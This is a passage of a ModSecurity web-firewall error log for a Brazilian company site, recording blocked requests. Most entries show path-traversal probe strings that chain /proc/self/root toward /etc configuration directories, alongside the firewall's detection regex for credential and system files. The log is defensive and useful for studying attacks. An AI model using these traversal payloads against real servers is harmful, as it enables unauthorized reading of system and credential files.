"OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablxKTjrdei6i7MVRTDS7AAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 12:20:14.372337 2026] [:error] [pid 17965:tid 140411708356352] [client 74.7.241.46:39530] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablxLqt8Nd0UC_OcbVHAuAAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:20:21.219713 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.241.46:39534] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablxNdY0UrI5A3LftIzyMAAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:20:23.675186 2026] [:error] [pid 18380:tid 140411632822016] [client 74.7.241.46:46466] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablxN64xEDsg_V3ESNZCTgAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:21:00.650604 2026] [:error] [pid 9299:tid 140411557287680] [client 74.7.241.46:46478] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablxXL-sgTmmJoPuMdyttgAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:22:08.039243 2026] [:error] [pid 9299:tid 140411649607424] [client 74.7.244.31:46896] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablxoL-sgTmmJoPuMdytygAAAss"]
[Tue Mar 17 12:22:14.496008 2026] [:error] [pid 17965:tid 140411574073088] [client 74.7.241.46:43594] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablxpqt8Nd0UC_OcbVHBMgAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:22:34.743038 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.241.46:44880] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablxutY0UrI5A3LftIzyfgAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:22:54.711767 2026] [:error] [pid 17965:tid 140411649607424] [client 74.7.228.16:60362] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablxzqt8Nd0UC_OcbVHBRwAAAIs"]
[Tue Mar 17 12:23:45.243253 2026] [:error] [pid 18380:tid 140411574073088] [client 74.7.241.46:50278] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablyAa4xEDsg_V3ESNZCxQAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:23:54.051115 2026] [:error] [pid 9299:tid 140411624429312] [client 74.7.241.46:52918] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablyCr-sgTmmJoPuMdyuKwAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:23:55.527312 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.241.46:55642] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablyC64xEDsg_V3ESNZCyQAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 12:24:13.731038 2026] [:error] [pid 2160:tid 140411641214720] [client 74.7.241.46:55646] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablyHTjrdei6i7MVRTDTVAAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:24:22.643094 2026] [:error] [pid 11293:tid 140411607643904] [client 74.7.241.46:40778] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablyJtCmCSWTlPouqorcDAAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 12:24:44.968093 2026] [:error] [pid 2473:tid 140411632822016] [client 74.7.241.46:54074] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablyPKBJNF7axNlVR0UNdQAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 12:25:41.358639 2026] [:error] [pid 7437:tid 140411716749056] [client 74.7.243.203:42486] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablydQeiSKl8TjouI-YSFgAAA8M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Tue Mar 17 12:26:20.808812 2026] [:error] [pid 11293:tid 140411649607424] [client 74.7.241.46:47466] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablynNCmCSWTlPouqorcdgAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 12:26:26.412194 2026] [:error] [pid 11293:tid 140411674785536] [client 74.7.241.46:56072] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablyotCmCSWTlPouqorcfQAAAMg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 12:26:32.515493 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.46:56074] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablyqNY0UrI5A3LftIzy8AAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 12:26:36.083984 2026] [:error] [pid 7437:tid 140411683178240] [client 74.7.241.46:35692] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablyrAeiSKl8TjouI-YSNgAAA8c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 12:27:09.561449 2026] [:error] [pid 17965:tid 140411632822016] [client 74.7.244.31:49586] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablyzat8Nd0UC_OcbVHCIwAAAI0"]
[Tue Mar 17 12:27:11.435425 2026] [:error] [pid 11293:tid 140411557287680] [client 74.7.241.46:35696] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablyz9CmCSWTlPouqorcowAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 12:27:54.870559 2026] [:error] [pid 17965:tid 140411565680384] [client 74.7.228.16:34610] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ably-qt8Nd0UC_OcbVHCYwAAAJU"]
[Tue Mar 17 12:28:13.355454 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.241.46:48648] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzDaBJNF7axNlVR0UOBgAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:28:13.636980 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.243.203:48338] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzDdY0UrI5A3LftIzzPgAAAYA"], referer: 